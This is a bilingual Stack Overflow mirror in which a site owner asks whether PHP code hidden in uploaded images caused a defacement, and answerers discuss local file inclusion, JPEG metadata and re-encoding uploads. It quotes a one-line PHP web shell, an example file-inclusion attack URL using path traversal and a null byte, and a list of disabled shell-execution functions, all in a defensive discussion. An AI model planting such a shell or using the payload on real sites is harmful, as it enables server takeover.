我的 php 网站被上传为图片的代码入侵了..?
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/3499173/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
My php site was hacked by codes uploaded as image..?
提问by imin
Yesterday my site was comprised. The attacker changes the index.php file to their own (with all their glory messages and greet). I've notified the hosting company about this (we are running on a dedicated server), and on my part, I'm trying to fix anything that seems to be the cause, cause I'm still unable to point how exactly did our server was attacked, but I think I've found certain script-based loopholes that could possibly be the culprit.
昨天我的网站被包括在内。攻击者将 index.php 文件更改为他们自己的(带有他们所有的荣耀信息和问候)。我已经通知了托管公司(我们在专用服务器上运行),而就我而言,我正在尝试修复任何似乎是原因的东西,因为我仍然无法指出我们的服务器受到攻击,但我想我发现了某些可能是罪魁祸首的基于脚本的漏洞。
Our site has an image uploader form, but all uploaded images are verified if they're indeed image file and not some codes by using php getimagesize function. Only if the image type is IMAGETYPE_GIF, or IMAGETYPE_JPEG, or IMAGETYPE_PNG will they be accepted. Else, they won't be able to upload the file. However I found out that one uploaded image file contains a php script inside it! You can download the image here. It's a valid image file, but try opening the image using any text editor and you will find a php code inside it:
我们的网站有一个图像上传表单,但是所有上传的图像都通过使用 php getimagesize 函数验证它们是否确实是图像文件而不是某些代码。仅当图像类型为 IMAGETYPE_GIF、IMAGETYPE_JPEG 或 IMAGETYPE_PNG 时才会被接受。否则,他们将无法上传文件。但是我发现一个上传的图像文件中包含一个 php 脚本!您可以在此处下载图像。这是一个有效的图像文件,但尝试使用任何文本编辑器打开图像,您会在其中找到一个 php 代码:
<?php
echo "<pre>"; system($_GET['cmd']); echo "</pre>";
?>
For example, the image is uploaded to this location (www.mysite.com/uploads/picodes.jpg). Take note that folder uploads' permission is 755. Is there any way in the world the attacker can execute the system (or any other command such as passthru, since we found out another image has the same code hidden as above, but instead of system, it has passthru command), by just for example, typing www.mysite.com/uploads/picodes.jpg?cmd=some command?? From my knowledge it can't be done (really appreciate it if someone can prove me wrong), unless the attacker can rename the jpg file to php, and even that, these codes are hidden deep inside the image (please see the image inside text editor to understand what I'm trying to say)
例如,图像上传到此位置 (www.mysite.com/uploads/picodes.jpg)。请注意,文件夹上传的权限是 755。攻击者有什么办法可以执行系统(或任何其他命令,例如 passthru,因为我们发现另一个图像隐藏了与上面相同的代码,但不是系统,它有 passthru 命令),例如,输入www.mysite.com/uploads/picodes.jpg?cmd=some command?? 据我所知,这是不可能完成的(如果有人能证明我错了,真的很感激),除非攻击者可以将 jpg 文件重命名为 php,即使如此,这些代码也隐藏在图像深处(请参阅里面的图像)文本编辑器来理解我想说的话)
For precautions, I've disabled these php functions (exec, passthru, proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,system) by adding them on the disable_functions in php.ini.
为预防起见,我通过在 php.ini 中的 disable_functions 中添加这些 php 函数(exec、passthru、proc_close、proc_get_status、proc_nice、proc_open、proc_terminate、shell_exec、system)禁用了它们。
Anyway I still think that the attacker gains access not through web, but through server exploit, but I think my hosting company thinks otherwise.
无论如何,我仍然认为攻击者不是通过网络,而是通过服务器漏洞获得访问权限,但我认为我的托管公司不这么认为。
回答by p0deje
Image file with arbitrary PHP code can't be exploited with direct request to it, e.g. http://www.mysite.com/uploads/image.jpg?cmd=somecode.
带有任意 PHP 代码的图像文件不能被直接请求利用,例如http://www.mysite.com/uploads/image.jpg?cmd=somecode.
Still, it can be used with Local File Inclusion vulnerability.
不过,它可以与本地文件包含漏洞一起使用。
For example, in index.php you use include('pages/' . $_GET['page'] . '.php');, then attacker can upload image with PHP code inside and execute commands with smth like this: http://www.mysite.com/index.php?page=../upload/image.jpg?cmd=somecode%00
例如,在你使用的 index.php 中include('pages/' . $_GET['page'] . '.php');,攻击者可以上传带有 PHP 代码的图片,并使用 smth 执行命令,如下所示:http://www.mysite.com/index.php?page=../upload/image.jpg?cmd=somecode%00
UPD: changed file in URL to page
UPD:将 URL 中的文件更改为页面
回答by Amber
JPEG files can contain arbitrary data in them in addition to the actual image data; it's part of the spec. Thus, merely checking if an image is a valid JPEG does not mean that the file is necessarily completely harmless.
除了实际的图像数据外,JPEG 文件中还可以包含任意数据;它是规范的一部分。因此,仅仅检查图像是否是有效的 JPEG 并不意味着该文件一定是完全无害的。
回答by Brent Baisley
This may not be a vulnerability in your code. I had the same thing happen to me a few weeks ago. Although ALL my index.php files were removed, even ones not directly web accessible. In my case, it was a security hole in Linux. Not anything to do with my code. This was the reply from my hosting provider (A2Hosting), regarding the problem. Once I convinced them it wasn't anything I did, they figure things out pretty quickly.
这可能不是您代码中的漏洞。几周前我也发生了同样的事情。虽然我所有的 index.php 文件都被删除了,即使是那些不能直接通过网络访问的文件。就我而言,这是 Linux 中的一个安全漏洞。与我的代码无关。这是我的托管服务提供商 (A2Hosting) 关于该问题的回复。一旦我说服他们这不是我做的任何事情,他们就会很快解决问题。
"A recent exploit in the Linux kernel was used to grant administrative (root) access to users' directories on the server. The attack consisted of removing index files found in directories and replacing them with the attacker's desired content: A black web page with the attacker's code name, "iSKORPiTX (Turkish Hacker)". This hack was massive across the internet and used a previously unknown vulnerability, limiting our ability in preventing it."
“最近 Linux 内核中的一个漏洞被用来授予对服务器上用户目录的管理(root)访问权限。攻击包括删除目录中的索引文件并将其替换为攻击者所需的内容:一个黑色网页,其中包含攻击者的代号为“iSKORPiTX(土耳其黑客)”。这次黑客攻击在互联网上是大规模的,并且使用了一个以前未知的漏洞,限制了我们阻止它的能力。
回答by user424821
My image file up-loader setting are: upload file to temp folder, creat new image using imagecreatefromjpeg or imagecreatefrompng or imagecreatefromgif and save, delete uploaded file from temp folder (all these stuff happening within same script action, so file uploaded in temp folder does not exist for long time)
我的图像文件上传器设置是:将文件上传到临时文件夹,使用 imagecreatefromjpeg 或 imagecreatefrompng 或 imagecreatefromgif 创建新图像并保存,从临时文件夹中删除上传的文件(所有这些内容都发生在同一个脚本操作中,因此上传到临时文件夹的文件不会好久不存在了)
